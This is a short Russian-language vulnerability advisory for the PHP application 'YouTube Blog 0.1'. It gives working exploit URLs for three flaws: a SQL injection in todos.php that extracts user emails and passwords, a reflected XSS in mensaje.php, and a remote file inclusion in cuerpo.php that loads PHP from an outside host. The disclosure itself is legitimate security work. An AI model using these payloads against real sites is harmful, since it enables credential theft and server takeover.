Программа: YouTube Blog 0.1

Найденные уязвимости позволяют удаленному злоумышленнику осуществить XSS
атаку, выполнить произвольный PHP сценарий и выполнить произвольный SQL код в
базе данных приложения.

1) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
todos.php. Удаленный пользователь может с помощью специально сформированного
запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,
contrasena,5,6,7+from+ytb_usuarios+where+id=1/*

2) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
mensaje.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в
контексте безопасности уязвимого сайта.

Эксплоит:

http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>

3) Уязвимость возникает из-за ошибки в проверке входных данных сценарием
cuerpo.php. Удаленный пользователь может выполнить произвольный PHP сценарий на
целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости
требует включение опции "register_globals" в конфигурационном файле PHP.

Эксплоит:

http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии